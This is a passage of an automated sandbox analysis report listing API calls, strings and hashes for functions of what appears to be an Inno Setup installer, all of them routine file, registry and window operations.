Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 353a0757e9fd9d11b623670cfd803f5b8829311614747a855f6672fd601e9639
Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
Opcode Fuzzy Hash: 353a0757e9fd9d11b623670cfd803f5b8829311614747a855f6672fd601e9639
Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D

Function 004143F0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414429
RealizePalette.GDI32(00000000), ref: 00414431
SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414445
RealizePalette.GDI32(00000000), ref: 0041444B
ReleaseDC.USER32(00000000,00000000), ref: 00414456

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Palette$RealizeSelect$Release
String ID:
API String ID: 2261976640-0
Opcode ID: c27572ba3b318a97157e2ff630850643e717ce291e632f808275401916b3f835
Instruction ID: 45e707893e7549553209a356c9d37de8c9d5e61d21803148832d8e75357fff83
Opcode Fuzzy Hash: c27572ba3b318a97157e2ff630850643e717ce291e632f808275401916b3f835
Instruction Fuzzy Hash: 6B01D47120C3806AD600A63D8C85A9F6BEC8FC6318F05946EF584DB3C2C979C8008761

Function 00406FB4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON

Download Yara Rule

APIs

WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407013
WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040708D
WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070E5

Strings

Z, xrefs: 0040704C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Enum$NameOpenResourceUniversal
String ID: Z
API String ID: 3604996873-1505515367
Opcode ID: 33049c7ea11c30121095e337e56ababc2e5377dae656412ba48cd4e8f0b87484
Instruction ID: bcee853a6b72702f38c87c8f124e100014cbe8ba86cd5f63ed9636da07a90c42
Opcode Fuzzy Hash: 33049c7ea11c30121095e337e56ababc2e5377dae656412ba48cd4e8f0b87484
Instruction Fuzzy Hash: 1C515170E042089FDB15DF65C941A9EBBB9EF09304F1081BAE900BB3D1D778AE458F5A

Function 0044D034 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 0044D0C2
DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D0ED
DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D175

Strings

, xrefs: 0044D0A7

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DrawText$EmptyRect
String ID:
API String ID: 182455014-2867612384
Opcode ID: 6196a861e208648b27b20abb2373d7b11b2b7b03d09eecf030d190a78f0ec511
Instruction ID: 523be4b6c2791812100f8c37f9dfaf26ef338fc18bb75760613781b343a57c3a
Opcode Fuzzy Hash: 6196a861e208648b27b20abb2373d7b11b2b7b03d09eecf030d190a78f0ec511
Instruction Fuzzy Hash: 5E516170E00248AFEB11DFA9C885BDEBBF9BF49304F14447AE845EB252D7789944CB64

Function 0042EFD4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0042EFFE

Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7

SelectObject.GDI32(?,00000000), ref: 0042F021
ReleaseDC.USER32(00000000,?), ref: 0042F100

Strings

...\, xrefs: 0042F0B2

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateFontIndirectObjectReleaseSelect
String ID: ...\
API String ID: 3133960002-983595016
Opcode ID: c0d9c5121ec3aa9e9e44613710b25e7259c00030b0a3b9e9a82ef93a81d8c198
Instruction ID: fc9511131d6b73f8b5d25d5b58e31b0db863437dcfa52910c3569242d90b8927
Opcode Fuzzy Hash: c0d9c5121ec3aa9e9e44613710b25e7259c00030b0a3b9e9a82ef93a81d8c198
Instruction Fuzzy Hash: C6316370B00128ABDB11DF96D841BAEB7F8EB48704FD1447BF410A7292D7785E45CA59

Function 00453930 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004974F9,_iu,?,00000000,00453A6A), ref: 00453A1F
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004974F9,_iu,?,00000000,00453A6A), ref: 00453A2F

Strings

_iu, xrefs: 004539C1
.tmp, xrefs: 004539D3

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: .tmp$_iu
API String ID: 3498533004-10593223
Opcode ID: 46e4244ac8577cde88a7cde4842e0d43aa75befccb9c2852c0b530efd0552fc6
Instruction ID: b5244aac63c968e20baa0947e479141d383441796118bbd3b2ad3f6bf7aa4b2b
Opcode Fuzzy Hash: 46e4244ac8577cde88a7cde4842e0d43aa75befccb9c2852c0b530efd0552fc6
Instruction Fuzzy Hash: 94319770E40149ABCB01EFA5C942B9EFBB5AF44349F60447AF840B72C2D7785F058A99

Function 00416420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
UnregisterClassA.USER32(?,00400000), ref: 004164BB
RegisterClassA.USER32(?), ref: 004164DE

Strings

@, xrefs: 00416439

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: f63e7bba2927d9b20c5332474012c1eec1724a49959d6227c5091a8278f22a45
Instruction ID: 0582e4decd83047b7d259989b1a1a5a7d11b83513a4c29c925389085b8c31041
Opcode Fuzzy Hash: f63e7bba2927d9b20c5332474012c1eec1724a49959d6227c5091a8278f22a45
Instruction Fuzzy Hash: 9E316F706042409BD720EF68C881B9B77E5AB85308F04457FF989DB396DB39D984CB6A

Function 004988E8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00499238,00000000,004989DE,?,?,00000000,0049C628), ref: 00498958
SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00499238,00000000,004989DE,?,?,00000000,0049C628), ref: 00498981
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0049899A

Strings

isRS-%.3u.tmp, xrefs: 00498937

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$Attributes$Move
String ID: isRS-%.3u.tmp
API String ID: 3839737484-3657609586
Opcode ID: 481a7bc48378292d0d9514443bc536ceeed31eb1900f78afcde6c41445521250
Instruction ID: b5053b6e7fa7181d8d55ffb0211e93ede9ed2a916a95833b3805d60610295bd2
Opcode Fuzzy Hash: 481a7bc48378292d0d9514443bc536ceeed31eb1900f78afcde6c41445521250
Instruction Fuzzy Hash: 1D2158B1D00159AFDF01DFA9C8819BFBBB8EB55314F11453FB414B72D1DA389E018A5A

Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
ExitProcess.KERNEL32 ref: 00404E0D

Strings

Runtime error at 00000000, xrefs: 00404DBE, 00404DD1
Error, xrefs: 00404DB9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000
API String ID: 1220098344-2970929446
Opcode ID: d2d2115462cf46c609d5747887fa32ed032da6f71deecf4a39b0bc855ac853b0
Instruction ID: fb75bd3449ddbba25be9859e6e9cdae11be236df4b8f13ef698ff7f8a35764cd
Opcode Fuzzy Hash: d2d2115462cf46c609d5747887fa32ed032da6f71deecf4a39b0bc855ac853b0
Instruction Fuzzy Hash: 5E215360B44241CBEB11ABB5ACC17263B9197E5348F048177E740B73E2C67C9D5587AE

Function 00456CA4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838

Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456CF8
RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456D25

Strings

RegisterTypeLib, xrefs: 00456D30
LoadTypeLib, xrefs: 00456D03

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 1312246647-2435364021
Opcode ID: f0fa4eb5ebe45c922c3dc586aac30000597ac91e8294356b8a9e27c423337520
Instruction ID: e26b8d5a5ba7491cefd4e72126217f2167f7f2a36d46249135fbb0ec9729d1e1
Opcode Fuzzy Hash: f0fa4eb5ebe45c922c3dc586aac30000597ac91e8294356b8a9e27c423337520
Instruction Fuzzy Hash: 55119670B00608BFDB11EFA6CD51A5EB7FDEB89705B518876F804D3652DA3C9D18CA24

Function 004571FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00457216
SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 004572B3

Strings

Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00457242
Failed to create DebugClientWnd, xrefs: 0045727C

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend
String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
API String ID: 3850602802-3720027226
Opcode ID: 9a46964b4fb996960123dd022ea41504470fc605069612a01803a2fa065a410b
Instruction ID: b5c581551a88cbf950d7fc36a96106bfa88ed205bfa31746cca5d2dcd4d7a39c
Opcode Fuzzy Hash: 9a46964b4fb996960123dd022ea41504470fc605069612a01803a2fa065a410b
Instruction Fuzzy Hash: 4A1123706082406BE710AB699C81B4F7B989B59319F04447BF984DF383D7788849CBAE

Function 00478B28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

GetFocus.USER32 ref: 00478B93
GetKeyState.USER32(0000007A), ref: 00478BA5
WaitMessage.USER32(?,00000000,00478BCC,?,00000000,00478BF3,?,?,00000001,00000000,?,?,00480889,00000000,004817AB), ref: 00478BAF

Strings

Wnd=$%x, xrefs: 00478B77

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FocusMessageStateTextWaitWindow
String ID: Wnd=$%x
API String ID: 1381870634-2927251529
Opcode ID: 56ac62ba261c13ec75de75e3b0b9d956a03bf57f73efdd15721ffc7da14054af
Instruction ID: dc81ccc12ba5f0d8980b62dc3576adf4111e854ad11f41bc8ce465a24b65dd47
Opcode Fuzzy Hash: 56ac62ba261c13ec75de75e3b0b9d956a03bf57f73efdd15721ffc7da14054af
Instruction Fuzzy Hash: 3711A370644249AFCB01EF65DC45A9E7BB8EB4D314B5184BEF408E7281DB7CAE00CA69

Function 0046E808 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E810
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E81F

Strings

(invalid), xrefs: 0046E8A2
%.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u, xrefs: 0046E894

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
API String ID: 1748579591-1013271723
Opcode ID: afc27b9defac450e26b0986b5fbe5a1bdb65cc68f7403b26db70cd1c163db108
Instruction ID: 1109e0a0549d5184889796f6d95c1db6af1f7efe6b7ed272276b3322b0c95b1e
Opcode Fuzzy Hash: afc27b9defac450e26b0986b5fbe5a1bdb65cc68f7403b26db70cd1c163db108
Instruction Fuzzy Hash: 1111F5A440C3909ED340DF2AC44032FBAE4AB89704F44496EF9C8D7381E779C948DBA7

Function 00453FEA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453FF7

Part of subcall function 00406F60: DeleteFileA.KERNEL32(00000000,0049C628,00498DC9,00000000,00498E1E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F6B

MoveFileA.KERNEL32(00000000,00000000), ref: 0045401C

Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513

Strings

MoveFile, xrefs: 00454025
DeleteFile, xrefs: 00454008

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$AttributesDeleteErrorLastMove
String ID: DeleteFile$MoveFile
API String ID: 3024442154-139070271
Opcode ID: e6ecb1dbfe451e73ced23eeeb408c191c9d173acb1a016d6f6abe8d636493956
Instruction ID: 5b319f4d86c429aaf34c497ec622aa84374fa007c64af5b461aa928f93ad298c
Opcode Fuzzy Hash: e6ecb1dbfe451e73ced23eeeb408c191c9d173acb1a016d6f6abe8d636493956
Instruction Fuzzy Hash: 42F036742041055BEB00FBB6D95266E67ECEB8470EF60443BF900BB6C3EA3D9E49492D

Function 004840A8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004840E9
RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0048410C

Strings

CSDVersion, xrefs: 004840E0
System\CurrentControlSet\Control\Windows, xrefs: 004840B6

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$System\CurrentControlSet\Control\Windows
API String ID: 3677997916-1910633163
Opcode ID: 65685140ca02fb2706327ddac66f800db42a2768e9aa8789b5b6754042f4557f
Instruction ID: 53b0cd76a008673903c9ef47d43ccdc3b5982ad8000f383f0d4d26435d6d51d8
Opcode Fuzzy Hash: 65685140ca02fb2706327ddac66f800db42a2768e9aa8789b5b6754042f4557f
Instruction Fuzzy Hash: ABF03175E0020AAADF10EAD08C4DB9FB3BC9B54704F104567E910E7281E678AA848B59

Function 0045940C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004840C7,?,00000001,?,?,004840C7,?,00000001,00000000), ref: 0042DE48

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459549,00000000,00459701,?,00000000,00000000,00000000), ref: 00459459

Strings

SOFTWARE\Microsoft\.NETFramework, xrefs: 0045942C
InstallRoot, xrefs: 00459448
.NET Framework not found, xrefs: 00459468

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpen
String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
API String ID: 47109696-2631785700
Opcode ID: 9bc35a40a01a3583b8422e9b6bcfd4ee6a9440aa628c341cd1f71c05f5256aad
Instruction ID: da45e090e08c2af83dc97eff45d409e8c8a7a5d294f3c067393b5131bf5ff8bf
Opcode Fuzzy Hash: 9bc35a40a01a3583b8422e9b6bcfd4ee6a9440aa628c341cd1f71c05f5256aad
Instruction Fuzzy Hash: F2F0AF31B04110ABC710AB1AD845B6E6398DBD235AF50803BF985DB253EA7CCC0B8769

Function 0042D900 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453BCE,00000000,00453C71,?,?,00000000,00000000,00000000,00000000,00000000,?,00454061,00000000), ref: 0042D91A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D920

Strings

kernel32.dll, xrefs: 0042D915
GetSystemWow64DirectoryA, xrefs: 0042D910

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemWow64DirectoryA$kernel32.dll
API String ID: 1646373207-4063490227
Opcode ID: 668015d286dac6ed483b16a742b0e62700dc4db53c3f9f7b812670d1427f7fe3
Instruction ID: c73f6de4eb886e968b085a6e7c7cc63e3b6fdbea6d7e209729b619e098e19142
Opcode Fuzzy Hash: 668015d286dac6ed483b16a742b0e62700dc4db53c3f9f7b812670d1427f7fe3
Instruction Fuzzy Hash: F9E04FE1B40B5113E710667A5C8276B158E4B84728F90443B3994E52C7DDBCD9C8566D

Function 0042EB64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAE0), ref: 0042EB72
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB78

Strings

user32.dll, xrefs: 0042EB6D
ShutdownBlockReasonDestroy, xrefs: 0042EB68

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
